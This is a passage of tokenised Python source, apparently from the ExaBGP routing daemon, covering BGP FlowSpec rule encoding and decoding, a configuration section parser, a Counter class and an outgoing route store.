object ) : <EOL> OPERATION = '<STR_LIT>' <EOL> operations = None <EOL> value = None <EOL> _string = { <EOL> NumericOperator . LT : '<STR_LIT:<>' , <EOL> NumericOperator . GT : '<STR_LIT:>>' , <EOL> NumericOperator . EQ : '<STR_LIT:=>' , <EOL> NumericOperator . LT | NumericOperator . EQ : '<STR_LIT>' , <EOL> NumericOperator . GT | NumericOperator . EQ : '<STR_LIT>' , <EOL> NumericOperator . AND | NumericOperator . LT : '<STR_LIT>' , <EOL> NumericOperator . AND | NumericOperator . GT : '<STR_LIT>' , <EOL> NumericOperator . AND | NumericOperator . EQ : '<STR_LIT>' , <EOL> NumericOperator . AND | NumericOperator . LT | NumericOperator . EQ : '<STR_LIT>' , <EOL> NumericOperator . AND | NumericOperator . GT | NumericOperator . EQ : '<STR_LIT>' , <EOL> } <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % ( self . _string [ self . operations & ( CommonOperator . EOL ^ <NUM_LIT> ) ] , self . value ) <EOL> class BinaryString ( object ) : <EOL> OPERATION = '<STR_LIT>' <EOL> operations = None <EOL> value = None <EOL> _string = { <EOL> BinaryOperator . INCLUDE : '<STR_LIT>' , <EOL> BinaryOperator . NOT : '<STR_LIT:!>' , <EOL> BinaryOperator . MATCH : '<STR_LIT:=>' , <EOL> BinaryOperator . AND | BinaryOperator . NOT : '<STR_LIT>' , <EOL> BinaryOperator . AND | BinaryOperator . MATCH : '<STR_LIT>' , <EOL> } <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % ( self . _string [ self . operations & ( CommonOperator . EOL ^ <NUM_LIT> ) ] , self . value ) <EOL> def converter ( function , klass = None ) : <EOL> def _integer ( value ) : <EOL> if klass is None : <EOL> return function ( value ) <EOL> try : <EOL> return klass ( value ) <EOL> except ValueError : <EOL> return function ( value ) <EOL> return _integer <EOL> def decoder ( function , klass = int ) : <EOL> def _inner ( value ) : <EOL> return klass ( function ( value ) ) <EOL> return _inner <EOL> def PacketLength ( data ) : <EOL> _str_bad_length = "<STR_LIT>" <EOL> number = int ( data ) <EOL> if number > <NUM_LIT> : <EOL> raise ValueError ( _str_bad_length ) <EOL> return number <EOL> def PortValue ( data ) : <EOL> _str_bad_port = "<STR_LIT>" <EOL> number = int ( data ) <EOL> if number < <NUM_LIT:0> or number > <NUM_LIT> : <EOL> raise ValueError ( _str_bad_port ) <EOL> return number <EOL> def DSCPValue ( data ) : <EOL> _str_bad_dscp = "<STR_LIT>" <EOL> number = int ( data ) <EOL> if number < <NUM_LIT:0> or number > <NUM_LIT> : <EOL> raise ValueError ( _str_bad_dscp ) <EOL> return number <EOL> def ClassValue ( data ) : <EOL> _str_bad_class = "<STR_LIT>" <EOL> number = int ( data ) <EOL> if number < <NUM_LIT:0> or number > <NUM_LIT> : <EOL> raise ValueError ( _str_bad_class ) <EOL> return number <EOL> def LabelValue ( data ) : <EOL> _str_bad_label = "<STR_LIT>" <EOL> number = int ( data ) <EOL> if number < <NUM_LIT:0> or number > <NUM_LIT> : <EOL> raise ValueError ( _str_bad_label ) <EOL> return number <EOL> class FlowDestination ( object ) : <EOL> ID = <NUM_LIT> <EOL> NAME = '<STR_LIT>' <EOL> class FlowSource ( object ) : <EOL> ID = <NUM_LIT> <EOL> NAME = '<STR_LIT:source>' <EOL> class Flow4Destination ( IPrefix4 , FlowDestination ) : <EOL> NAME = '<STR_LIT>' <EOL> class Flow4Source ( IPrefix4 , FlowSource ) : <EOL> NAME = '<STR_LIT>' <EOL> class Flow6Destination ( IPrefix6 , FlowDestination ) : <EOL> NAME = '<STR_LIT>' <EOL> class Flow6Source ( IPrefix6 , FlowSource ) : <EOL> NAME = '<STR_LIT>' <EOL> class FlowIPProtocol ( IOperationByte , NumericString , IPv4 ) : <EOL> ID = <NUM_LIT> <EOL> NAME = '<STR_LIT>' <EOL> converter = staticmethod ( converter ( Protocol . named , Protocol ) ) <EOL> decoder = staticmethod ( decoder ( ord , Protocol ) ) <EOL> class FlowNextHeader ( IOperationByte , NumericString , IPv6 ) : <EOL> ID = <NUM_LIT> <EOL> NAME = '<STR_LIT>' <EOL> converter = staticmethod ( converter ( Protocol . named , Protocol ) ) <EOL> decoder = staticmethod ( decoder ( ord , Protocol ) ) <EOL> class FlowAnyPort ( IOperationByteShort , NumericString , IPv4 , IPv6 ) : <EOL> ID = <NUM_LIT> <EOL> NAME = '<STR_LIT:port>' <EOL> converter = staticmethod ( converter ( PortValue ) ) <EOL> decoder = staticmethod ( _number ) <EOL> class FlowDestinationPort ( IOperationByteShort , NumericString , IPv4 , IPv6 ) : <EOL> ID = <NUM_LIT> <EOL> NAME = '<STR_LIT>' <EOL> converter = staticmethod ( converter ( PortValue ) ) <EOL> decoder = staticmethod ( _number ) <EOL> class FlowSourcePort ( IOperationByteShort , NumericString , IPv4 , IPv6 ) : <EOL> ID = <NUM_LIT> <EOL> NAME = '<STR_LIT>' <EOL> converter = staticmethod ( converter ( PortValue ) ) <EOL> decoder = staticmethod ( _number ) <EOL> class FlowICMPType ( IOperationByte , BinaryString , IPv4 , IPv6 ) : <EOL> ID = <NUM_LIT> <EOL> NAME = '<STR_LIT>' <EOL> converter = staticmethod ( converter ( ICMPType . named ) ) <EOL> decoder = staticmethod ( decoder ( _number , ICMPType ) ) <EOL> class FlowICMPCode ( IOperationByte , BinaryString , IPv4 , IPv6 ) : <EOL> ID = <NUM_LIT> <EOL> NAME = '<STR_LIT>' <EOL> converter = staticmethod ( converter ( ICMPCode . named ) ) <EOL> decoder = staticmethod ( decoder ( _number , ICMPCode ) ) <EOL> class FlowTCPFlag ( IOperationByte , BinaryString , IPv4 , IPv6 ) : <EOL> ID = <NUM_LIT> <EOL> NAME = '<STR_LIT>' <EOL> FLAG = True <EOL> converter = staticmethod ( converter ( TCPFlag . named ) ) <EOL> decoder = staticmethod ( decoder ( ord , TCPFlag ) ) <EOL> class FlowPacketLength ( IOperationByteShort , NumericString , IPv4 , IPv6 ) : <EOL> ID = <NUM_LIT> <EOL> NAME = '<STR_LIT>' <EOL> converter = staticmethod ( converter ( PacketLength ) ) <EOL> decoder = staticmethod ( _number ) <EOL> class FlowDSCP ( IOperationByteShort , NumericString , IPv4 ) : <EOL> ID = <NUM_LIT> <EOL> NAME = '<STR_LIT>' <EOL> converter = staticmethod ( converter ( DSCPValue ) ) <EOL> decoder = staticmethod ( _number ) <EOL> class FlowTrafficClass ( IOperationByte , NumericString , IPv6 ) : <EOL> ID = <NUM_LIT> <EOL> NAME = '<STR_LIT>' <EOL> converter = staticmethod ( converter ( ClassValue ) ) <EOL> decoder = staticmethod ( _number ) <EOL> class FlowFragment ( IOperationByteShort , BinaryString , IPv4 ) : <EOL> ID = <NUM_LIT> <EOL> NAME = '<STR_LIT>' <EOL> FLAG = True <EOL> converter = staticmethod ( converter ( Fragment . named ) ) <EOL> decoder = staticmethod ( decoder ( ord , Fragment ) ) <EOL> class FlowFlowLabel ( IOperationByteShort , NumericString , IPv6 ) : <EOL> ID = <NUM_LIT> <EOL> NAME = '<STR_LIT>' <EOL> converter = staticmethod ( converter ( LabelValue ) ) <EOL> decoder = staticmethod ( _number ) <EOL> decode = { AFI . ipv4 : { } , AFI . ipv6 : { } } <EOL> factory = { AFI . ipv4 : { } , AFI . ipv6 : { } } <EOL> for content in dir ( ) : <EOL> kls = globals ( ) . get ( content , None ) <EOL> if not isinstance ( kls , type ( IComponent ) ) : <EOL> continue <EOL> if not issubclass ( kls , IComponent ) : <EOL> continue <EOL> if issubclass ( kls , IPv4 ) : <EOL> _afi = AFI . ipv4 <EOL> elif issubclass ( kls , IPv6 ) : <EOL> _afi = AFI . ipv6 <EOL> else : <EOL> continue <EOL> _ID = getattr ( kls , '<STR_LIT>' , None ) <EOL> if not _ID : <EOL> continue <EOL> factory [ _afi ] [ _ID ] = kls <EOL> name = getattr ( kls , '<STR_LIT>' ) <EOL> if issubclass ( kls , IOperation ) : <EOL> if issubclass ( kls , BinaryString ) : <EOL> decode [ _afi ] [ _ID ] = '<STR_LIT>' <EOL> elif issubclass ( kls , NumericString ) : <EOL> decode [ _afi ] [ _ID ] = '<STR_LIT>' <EOL> else : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> elif issubclass ( kls , IPrefix ) : <EOL> decode [ _afi ] [ _ID ] = '<STR_LIT>' <EOL> else : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> def _unique ( ) : <EOL> value = <NUM_LIT:0> <EOL> while True : <EOL> yield value <EOL> value += <NUM_LIT:1> <EOL> unique = _unique ( ) <EOL> @ NLRI . register ( AFI . ipv4 , SAFI . flow_ip ) <EOL> @ NLRI . register ( AFI . ipv6 , SAFI . flow_ip ) <EOL> @ NLRI . register ( AFI . ipv4 , SAFI . flow_vpn ) <EOL> @ NLRI . register ( AFI . ipv6 , SAFI . flow_vpn ) <EOL> class Flow ( NLRI ) : <EOL> def __init__ ( self , afi = AFI . ipv4 , safi = SAFI . flow_ip , action = OUT . UNSET ) : <EOL> NLRI . __init__ ( self , afi , safi , action ) <EOL> self . rules = { } <EOL> self . nexthop = NoNextHop <EOL> self . rd = RouteDistinguisher . NORD <EOL> self . unique = unique . next ( ) <EOL> def __eq__ ( self , other ) : <EOL> return self . rules == other . rules and self . action == other . action and self . nexthop == other . nexthop and self . rd == other . rd <EOL> def __ne__ ( self , other ) : <EOL> return not self . __eq__ ( other ) <EOL> def __lt__ ( self , other ) : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> def __le__ ( self , other ) : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> def __gt__ ( self , other ) : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> def __ge__ ( self , other ) : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> def __len__ ( self ) : <EOL> return len ( self . pack ( ) ) <EOL> def add ( self , rule ) : <EOL> ID = rule . ID <EOL> if ID in ( FlowDestination . ID , FlowSource . ID ) : <EOL> if ID in self . rules : <EOL> return False <EOL> if ID == FlowDestination . ID : <EOL> pair = self . rules . get ( FlowSource . ID , [ ] ) <EOL> else : <EOL> pair = self . rules . get ( FlowDestination . ID , [ ] ) <EOL> if pair : <EOL> if rule . afi != pair [ <NUM_LIT:0> ] . afi : <EOL> return False <EOL> if rule . NAME . endswith ( '<STR_LIT>' ) : <EOL> self . afi = AFI ( AFI . ipv6 ) <EOL> self . rules . setdefault ( ID , [ ] ) . append ( rule ) <EOL> return True <EOL> def pack ( self , negotiated = None ) : <EOL> ordered_rules = [ ] <EOL> for ID in sorted ( self . rules . keys ( ) ) : <EOL> rules = self . rules [ ID ] <EOL> for rule in rules : <EOL> rule . operations &= ( CommonOperator . EOL ^ <NUM_LIT> ) <EOL> rules [ - <NUM_LIT:1> ] . operations |= CommonOperator . EOL <EOL> if ID not in ( FlowDestination . ID , FlowSource . ID ) : <EOL> ordered_rules . append ( chr ( ID ) ) <EOL> ordered_rules . append ( '<STR_LIT>' . join ( rule . pack ( ) for rule in rules ) ) <EOL> components = self . rd . pack ( ) + '<STR_LIT>' . join ( ordered_rules ) <EOL> l = len ( components ) <EOL> if l < <NUM_LIT> : <EOL> return "<STR_LIT>" % ( chr ( l ) , components ) <EOL> if l < <NUM_LIT> : <EOL> return "<STR_LIT>" % ( pack ( '<STR_LIT>' , l | <NUM_LIT> ) , components ) <EOL> raise Notify ( <NUM_LIT:3> , <NUM_LIT:0> , "<STR_LIT>" ) <EOL> def extensive ( self ) : <EOL> string = [ ] <EOL> for index in sorted ( self . rules ) : <EOL> rules = self . rules [ index ] <EOL> s = [ ] <EOL> for idx , rule in enumerate ( rules ) : <EOL> if idx and not rule . operations & NumericOperator . AND : <EOL> s . append ( '<STR_LIT:U+0020>' ) <EOL> s . append ( rule ) <EOL> line = '<STR_LIT>' . join ( str ( _ ) for _ in s ) <EOL> if len ( s ) > <NUM_LIT:1> : <EOL> line = '<STR_LIT>' % line <EOL> string . append ( '<STR_LIT>' % ( rules [ <NUM_LIT:0> ] . NAME , line ) ) <EOL> nexthop = '<STR_LIT>' % self . nexthop if self . nexthop is not NoNextHop else '<STR_LIT>' <EOL> rd = '<STR_LIT>' if self . rd is RouteDistinguisher . NORD else str ( self . rd ) <EOL> return '<STR_LIT>' + '<STR_LIT>' . join ( string ) + rd + nexthop <EOL> def __str__ ( self ) : <EOL> return self . extensive ( ) <EOL> def _json ( self ) : <EOL> string = [ ] <EOL> for index in sorted ( self . rules ) : <EOL> rules = self . rules [ index ] <EOL> s = [ ] <EOL> for idx , rule in enumerate ( rules ) : <EOL> if idx and not rule . operations & NumericOperator . AND : <EOL> s . append ( '<STR_LIT:U+002CU+0020>' ) <EOL> if rule . FLAG : <EOL> s . append ( '<STR_LIT:U+002CU+0020>' . join ( '<STR_LIT>' % flag for flag in rule . value . named_bits ( ) ) ) <EOL> else : <EOL> s . append ( '<STR_LIT>' % rule ) <EOL> string . append ( '<STR_LIT>' % ( rules [ <NUM_LIT:0> ] . NAME , '<STR_LIT>' . join ( str ( _ ) for _ in s ) . replace ( '<STR_LIT>' , '<STR_LIT>' ) ) ) <EOL> nexthop = '<STR_LIT>' % self . nexthop if self . nexthop is not NoNextHop else '<STR_LIT>' <EOL> rd = '<STR_LIT>' if self . rd is RouteDistinguisher . NORD else '<STR_LIT>' % self . rd . json ( ) <EOL> compatibility = '<STR_LIT>' % self . extensive ( ) <EOL> return '<STR_LIT:{>' + '<STR_LIT:U+002C>' . join ( string ) + rd + nexthop + compatibility + '<STR_LIT>' <EOL> def json ( self ) : <EOL> return '<STR_LIT>' % ( self . unique , self . _json ( ) ) <EOL> def index ( self ) : <EOL> return self . pack ( ) <EOL> @ classmethod <EOL> def unpack_nlri ( cls , afi , safi , bgp , action , addpath ) : <EOL> length , bgp = ord ( bgp [ <NUM_LIT:0> ] ) , bgp [ <NUM_LIT:1> : ] <EOL> if length & <NUM_LIT> == <NUM_LIT> : <EOL> extra , bgp = ord ( bgp [ <NUM_LIT:0> ] ) , bgp [ <NUM_LIT:1> : ] <EOL> length = ( ( length & <NUM_LIT> ) << <NUM_LIT:16> ) + extra <EOL> if length > len ( bgp ) : <EOL> raise Notify ( <NUM_LIT:3> , <NUM_LIT:10> , '<STR_LIT>' ) <EOL> over = bgp [ length : ] <EOL> bgp = bgp [ : length ] <EOL> nlri = Flow ( afi , safi , action ) <EOL> if safi == SAFI . flow_vpn : <EOL> nlri . rd = RouteDistinguisher ( bgp [ : <NUM_LIT:8> ] ) <EOL> bgp = bgp [ <NUM_LIT:8> : ] <EOL> seen = [ ] <EOL> while bgp : <EOL> what , bgp = ord ( bgp [ <NUM_LIT:0> ] ) , bgp [ <NUM_LIT:1> : ] <EOL> if what not in decode . get ( afi , { } ) : <EOL> raise Notify ( <NUM_LIT:3> , <NUM_LIT:10> , '<STR_LIT>' % what ) <EOL> seen . append ( what ) <EOL> if sorted ( seen ) != seen : <EOL> raise Notify ( <NUM_LIT:3> , <NUM_LIT:10> , '<STR_LIT>' % seen ) <EOL> decoded = decode [ afi ] [ what ] <EOL> klass = factory [ afi ] [ what ] <EOL> if decoded == '<STR_LIT>' : <EOL> adding , bgp = klass . make ( bgp ) <EOL> if not nlri . add ( adding ) : <EOL> raise Notify ( <NUM_LIT:3> , <NUM_LIT:10> , '<STR_LIT>' % seen ) <EOL> else : <EOL> end = False <EOL> while not end : <EOL> byte , bgp = ord ( bgp [ <NUM_LIT:0> ] ) , bgp [ <NUM_LIT:1> : ] <EOL> end = CommonOperator . eol ( byte ) <EOL> operator = CommonOperator . operator ( byte ) <EOL> length = CommonOperator . length ( byte ) <EOL> value , bgp = bgp [ : length ] , bgp [ length : ] <EOL> adding = klass . decoder ( value ) <EOL> nlri . add ( klass ( operator , adding ) ) <EOL> return nlri , bgp + over </s>
<s> """<STR_LIT>""" <EOL> from string import ascii_letters <EOL> from string import digits <EOL> from exabgp . configuration . core . error import Error <EOL> class Section ( Error ) : <EOL> name = '<STR_LIT>' <EOL> known = dict ( ) <EOL> default = dict ( ) <EOL> action = { } <EOL> assign = { } <EOL> def __init__ ( self , tokerniser , scope , error , logger ) : <EOL> Error . __init__ ( self ) <EOL> self . tokeniser = tokerniser <EOL> self . scope = scope <EOL> self . error = error <EOL> self . logger = logger <EOL> self . _names = [ ] <EOL> def clear ( self ) : <EOL> raise RuntimeError ( '<STR_LIT>' % self . __class__ . __name__ ) <EOL> @ classmethod <EOL> def register ( cls , name , action ) : <EOL> def inner ( function ) : <EOL> if name in cls . known : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> cls . known [ name ] = function <EOL> cls . action [ name ] = action <EOL> return function <EOL> return inner <EOL> def check_name ( self , name ) : <EOL> if any ( False if c in ascii_letters + digits + '<STR_LIT>' else True for c in name ) : <EOL> self . throw ( '<STR_LIT>' % self . name ) <EOL> if name in self . _names : <EOL> self . throw ( '<STR_LIT>' % ( name , self . name ) ) <EOL> self . _names . append ( name ) <EOL> def pre ( self ) : <EOL> return True <EOL> def post ( self ) : <EOL> return True <EOL> def parse ( self , name , command ) : <EOL> if command not in self . known : <EOL> return self . error . set ( '<STR_LIT>' % ( command , '<STR_LIT:U+002CU+0020>' . join ( self . known ) ) ) <EOL> try : <EOL> if command in self . default : <EOL> insert = self . known [ command ] ( self . tokeniser . iterate , self . default [ command ] ) <EOL> else : <EOL> insert = self . known [ command ] ( self . tokeniser . iterate ) <EOL> action = self . action [ command ] <EOL> if action == '<STR_LIT>' : <EOL> self . scope . set ( command , insert ) <EOL> elif action == '<STR_LIT>' : <EOL> self . scope . extend ( name , insert ) <EOL> elif action == '<STR_LIT>' : <EOL> self . scope . append ( name , insert ) <EOL> elif action == '<STR_LIT>' : <EOL> self . scope . append ( command , insert ) <EOL> elif action == '<STR_LIT>' : <EOL> self . scope . attribute_add ( name , insert ) <EOL> elif action == '<STR_LIT>' : <EOL> self . scope . nlri_assign ( name , self . assign [ command ] , insert ) <EOL> elif action == '<STR_LIT>' : <EOL> for adding in insert : <EOL> self . scope . nlri_add ( name , command , adding ) <EOL> elif action == '<STR_LIT>' : <EOL> self . scope . nlri_nexthop ( name , insert ) <EOL> elif action == '<STR_LIT>' : <EOL> ip , attribute = insert <EOL> if ip : <EOL> self . scope . nlri_nexthop ( name , ip ) <EOL> if attribute : <EOL> self . scope . attribute_add ( name , attribute ) <EOL> elif action == '<STR_LIT>' : <EOL> pass <EOL> else : <EOL> raise RuntimeError ( '<STR_LIT>' % ( name , command ) ) <EOL> return True <EOL> except ValueError , exc : <EOL> return self . error . set ( str ( exc ) ) <EOL> return True </s>
<s> """<STR_LIT>""" <EOL> from _abcoll import * <EOL> class Counter ( dict ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , iterable = None , ** kwds ) : <EOL> '''<STR_LIT>''' <EOL> super ( Counter , self ) . __init__ ( ) <EOL> self . update ( iterable , ** kwds ) <EOL> def __missing__ ( self , key ) : <EOL> '<STR_LIT>' <EOL> return <NUM_LIT:0> <EOL> def most_common ( self , n = None ) : <EOL> '''<STR_LIT>''' <EOL> if n is None : <EOL> return sorted ( self . iteritems ( ) , key = _itemgetter ( <NUM_LIT:1> ) , reverse = True ) <EOL> return _heapq . nlargest ( n , self . iteritems ( ) , key = _itemgetter ( <NUM_LIT:1> ) ) <EOL> def elements ( self ) : <EOL> '''<STR_LIT>''' <EOL> return _chain . from_iterable ( _starmap ( _repeat , self . iteritems ( ) ) ) <EOL> @ classmethod <EOL> def fromkeys ( cls , iterable , v = None ) : <EOL> raise NotImplementedError ( <EOL> '<STR_LIT>' ) <EOL> def update ( self , iterable = None , ** kwds ) : <EOL> '''<STR_LIT>''' <EOL> if iterable is not None : <EOL> if isinstance ( iterable , Mapping ) : <EOL> if self : <EOL> self_get = self . get <EOL> for elem , count in iterable . iteritems ( ) : <EOL> self [ elem ] = self_get ( elem , <NUM_LIT:0> ) + count <EOL> else : <EOL> super ( Counter , self ) . update ( iterable ) <EOL> else : <EOL> self_get = self . get <EOL> for elem in iterable : <EOL> self [ elem ] = self_get ( elem , <NUM_LIT:0> ) + <NUM_LIT:1> <EOL> if kwds : <EOL> self . update ( kwds ) <EOL> def subtract ( self , iterable = None , ** kwds ) : <EOL> '''<STR_LIT>''' <EOL> if iterable is not None : <EOL> self_get = self . get <EOL> if isinstance ( iterable , Mapping ) : <EOL> for elem , count in iterable . items ( ) : <EOL> self [ elem ] = self_get ( elem , <NUM_LIT:0> ) - count <EOL> else : <EOL> for elem in iterable : <EOL> self [ elem ] = self_get ( elem , <NUM_LIT:0> ) - <NUM_LIT:1> <EOL> if kwds : <EOL> self . subtract ( kwds ) <EOL> def copy ( self ) : <EOL> '<STR_LIT>' <EOL> return self . __class__ ( self ) <EOL> def __reduce__ ( self ) : <EOL> return self . __class__ , ( dict ( self ) , ) <EOL> def __delitem__ ( self , elem ) : <EOL> '<STR_LIT>' <EOL> if elem in self : <EOL> super ( Counter , self ) . __delitem__ ( elem ) <EOL> def __repr__ ( self ) : <EOL> if not self : <EOL> return '<STR_LIT>' % self . __class__ . __name__ <EOL> items = '<STR_LIT:U+002CU+0020>' . join ( map ( '<STR_LIT>' . __mod__ , self . most_common ( ) ) ) <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , items ) <EOL> def __add__ ( self , other ) : <EOL> '''<STR_LIT>''' <EOL> if not isinstance ( other , Counter ) : <EOL> return NotImplemented <EOL> result = Counter ( ) <EOL> for elem , count in self . items ( ) : <EOL> newcount = count + other [ elem ] <EOL> if newcount > <NUM_LIT:0> : <EOL> result [ elem ] = newcount <EOL> for elem , count in other . items ( ) : <EOL> if elem not in self and count > <NUM_LIT:0> : <EOL> result [ elem ] = count <EOL> return result <EOL> def __sub__ ( self , other ) : <EOL> '''<STR_LIT>''' <EOL> if not isinstance ( other , Counter ) : <EOL> return NotImplemented <EOL> result = Counter ( ) <EOL> for elem , count in self . items ( ) : <EOL> newcount = count - other [ elem ] <EOL> if newcount > <NUM_LIT:0> : <EOL> result [ elem ] = newcount <EOL> for elem , count in other . items ( ) : <EOL> if elem not in self and count < <NUM_LIT:0> : <EOL> result [ elem ] = <NUM_LIT:0> - count <EOL> return result <EOL> def __or__ ( self , other ) : <EOL> '''<STR_LIT>''' <EOL> if not isinstance ( other , Counter ) : <EOL> return NotImplemented <EOL> result = Counter ( ) <EOL> for elem , count in self . items ( ) : <EOL> other_count = other [ elem ] <EOL> newcount = other_count if count < other_count else count <EOL> if newcount > <NUM_LIT:0> : <EOL> result [ elem ] = newcount <EOL> for elem , count in other . items ( ) : <EOL> if elem not in self and count > <NUM_LIT:0> : <EOL> result [ elem ] = count <EOL> return result <EOL> def __and__ ( self , other ) : <EOL> '''<STR_LIT>''' <EOL> if not isinstance ( other , Counter ) : <EOL> return NotImplemented <EOL> result = Counter ( ) <EOL> for elem , count in self . items ( ) : <EOL> other_count = other [ elem ] <EOL> newcount = count if count < other_count else other_count <EOL> if newcount > <NUM_LIT:0> : <EOL> result [ elem ] = newcount <EOL> return result </s>
<s> """<STR_LIT>""" <EOL> from exabgp . protocol . resource import BitResource <EOL> class Fragment ( BitResource ) : <EOL> NAME = '<STR_LIT>' <EOL> NOT = <NUM_LIT> <EOL> DONT = <NUM_LIT> <EOL> IS = <NUM_LIT> <EOL> FIRST = <NUM_LIT> <EOL> LAST = <NUM_LIT> <EOL> codes = dict ( ( k . lower ( ) . replace ( '<STR_LIT:_>' , '<STR_LIT:->' ) , v ) for ( k , v ) in { <EOL> '<STR_LIT>' : NOT , <EOL> '<STR_LIT>' : DONT , <EOL> '<STR_LIT>' : IS , <EOL> '<STR_LIT>' : FIRST , <EOL> '<STR_LIT>' : LAST , <EOL> } . items ( ) ) <EOL> names = dict ( [ ( r , l ) for ( l , r ) in codes . items ( ) ] ) </s>
<s> """<STR_LIT>""" <EOL> from exabgp . protocol . family import AFI <EOL> from exabgp . bgp . message import IN <EOL> from exabgp . bgp . message import OUT <EOL> from exabgp . bgp . message import Update <EOL> from exabgp . bgp . message . refresh import RouteRefresh <EOL> from exabgp . bgp . message . update . attribute import Attributes <EOL> class Store ( object ) : <EOL> def __init__ ( self , families ) : <EOL> self . _watchdog = { } <EOL> self . cache = False <EOL> self . families = families <EOL> self . clear ( ) <EOL> self . _cache_attribute = { } <EOL> self . _seen = { } <EOL> self . _modify_nlri = { } <EOL> self . _modify_sorted = { } <EOL> self . _changes = None <EOL> self . _enhanced_refresh_start = [ ] <EOL> self . _enhanced_refresh_delay = [ ] <EOL> def reset ( self ) : <EOL> self . _enhanced_refresh_start = [ ] <EOL> self . _enhanced_refresh_delay = [ ] <EOL> for update in self . updates ( True ) : <EOL> pass <EOL> def clear ( self ) : <EOL> self . _cache_attribute = { } <EOL> self . _seen = { } <EOL> self . _modify_nlri = { } <EOL> self . _modify_sorted = { } <EOL> self . _changes = None <EOL> self . reset ( ) <EOL> def sent_changes ( self , families = None ) : <EOL> requested_families = self . families if not families else set ( families ) . intersection ( self . families ) <EOL> for family in requested_families : <EOL> for change in self . _seen . get ( family , { } ) . values ( ) : <EOL> if change . nlri . action == OUT . ANNOUNCE : <EOL> yield change <EOL> def resend ( self , families , enhanced_refresh ) : <EOL> requested_families = self . families if not families else set ( families ) . intersection ( self . families ) <EOL> def _announced ( family ) : <EOL> for change in self . _seen . get ( family , { } ) . values ( ) : <EOL> if change . nlri . action == OUT . ANNOUNCE : <EOL> yield change <EOL> self . _seen [ family ] = { } <EOL> if enhanced_refresh : <EOL> for family in requested_families : <EOL> if family not in self . _enhanced_refresh_start : <EOL> self . _enhanced_refresh_start . append ( family ) <EOL> for change in _announced ( family ) : <EOL> self . insert_announced ( change , True ) <EOL> else : <EOL> for family in requested_families : <EOL> for change in _announced ( family ) : <EOL> self . insert_announced ( change , True ) <EOL> def queued_changes ( self ) : <EOL> for change in self . _modify_nlri . values ( ) : <EOL> yield change <EOL> def replace ( self , previous , changes ) : <EOL> for change in previous : <EOL> change . nlri . action = OUT . WITHDRAW <EOL> self . insert_announced ( change , True ) <EOL> for change in changes : <EOL> self . insert_announced ( change , True ) <EOL> def insert_announced_watchdog ( self , change ) : <EOL> watchdog = change . attributes . watchdog ( ) <EOL> withdraw = change . attributes . withdraw ( ) <EOL> if watchdog : <EOL> if withdraw : <EOL> self . _watchdog . setdefault ( watchdog , { } ) . setdefault ( '<STR_LIT:->' , { } ) [ change . index ( ) ] = change <EOL> return True <EOL> self . _watchdog . setdefault ( watchdog , { } ) . setdefault ( '<STR_LIT:+>' , { } ) [ change . index ( ) ] = change <EOL> self . insert_announced ( change ) <EOL> return True <EOL> def announce_watchdog ( self , watchdog ) : <EOL> if watchdog in self . _watchdog : <EOL> for change in self . _watchdog [ watchdog ] . get ( '<STR_LIT:->' , { } ) . values ( ) : <EOL> change . nlri . action = OUT . ANNOUNCE <EOL> self . insert_announced ( change ) <EOL> self . _watchdog [ watchdog ] . setdefault ( '<STR_LIT:+>' , { } ) [ change . index ( ) ] = change <EOL> self . _watchdog [ watchdog ] [ '<STR_LIT:->' ] . pop ( change . index ( ) ) <EOL> def withdraw_watchdog ( self , watchdog ) : <EOL> if watchdog in self . _watchdog : <EOL> for change in self . _watchdog [ watchdog ] . get ( '<STR_LIT:+>' , { } ) . values ( ) : <EOL> change . nlri . action = OUT . WITHDRAW <EOL> self . insert_announced ( change ) <EOL> self . _watchdog [ watchdog ] . setdefault ( '<STR_LIT:->' , { } ) [ change . index ( ) ] = change <EOL> self . _watchdog [ watchdog ] [ '<STR_LIT:+>' ] . pop ( change . index ( ) ) <EOL> def insert_received ( self , change ) : <EOL> if not self . cache : <EOL> return <EOL> elif change . nlri . action == IN . ANNOUNCED : <EOL> self . _seen [ change . index ( ) ] = change <EOL> else : <EOL> self . _seen . pop ( change . index ( ) , None ) <EOL> def insert_announced ( self , change , force = False ) : <EOL> if not force and self . _enhanced_refresh_start : <EOL> self . _enhanced_refresh_delay . append ( change ) <EOL> return <EOL> change_nlri_index = change . index ( ) <EOL> change_attr_index = change . attributes . index ( ) <EOL> dict_sorted = self . _modify_sorted <EOL> dict_nlri = self . _modify_nlri <EOL> dict_attr = self . _cache_attribute <EOL> if change_nlri_index in dict_nlri : <EOL> old_attr_index = dict_nlri [ change_nlri_index ] . attributes . index ( ) <EOL> old_change = dict_nlri . pop ( change_nlri_index ) <EOL> del dict_sorted [ old_attr_index ] [ change_nlri_index ] <EOL> if not dict_sorted [ old_attr_index ] : <EOL> del dict_sorted [ old_attr_index ] <EOL> if old_change . nlri . action == OUT . ANNOUNCE and change . nlri . action == OUT . WITHDRAW : <EOL> if self . cache and change_nlri_index not in self . _seen . get ( change . nlri . family ( ) , { } ) : <EOL> return <EOL> dict_sorted . setdefault ( change_attr_index , { } ) [ change_nlri_index ] = change <EOL> dict_nlri [ change_nlri_index ] = change <EOL> if change_attr_index not in dict_attr : <EOL> dict_attr [ change_attr_index ] = change <EOL> def updates ( self , grouped ) : <EOL> if self . _changes : <EOL> dict_nlri = self . _modify_nlri <EOL> for family in self . _seen : <EOL> for change in self . _seen [ family ] . itervalues ( ) : <EOL> if change . index ( ) not in self . _modify_nlri : <EOL> change . nlri . action = OUT . WITHDRAW <EOL> self . insert_announced ( change , True ) <EOL> for new in self . _changes : <EOL> self . insert_announced ( new , True ) <EOL> self . _changes = None <EOL> rr_announced = [ ] <EOL> for afi , safi in self . _enhanced_refresh_start : <EOL> rr_announced . append ( ( afi , safi ) ) <EOL> yield Update ( RouteRefresh ( afi , safi , RouteRefresh . start ) , Attributes ( ) ) <EOL> dict_sorted = self . _modify_sorted <EOL> dict_nlri = self . _modify_nlri <EOL> dict_attr = self . _cache_attribute <EOL> for attr_index , full_dict_change in dict_sorted . items ( ) : <EOL> if self . cache : <EOL> dict_change = { } <EOL> for nlri_index , 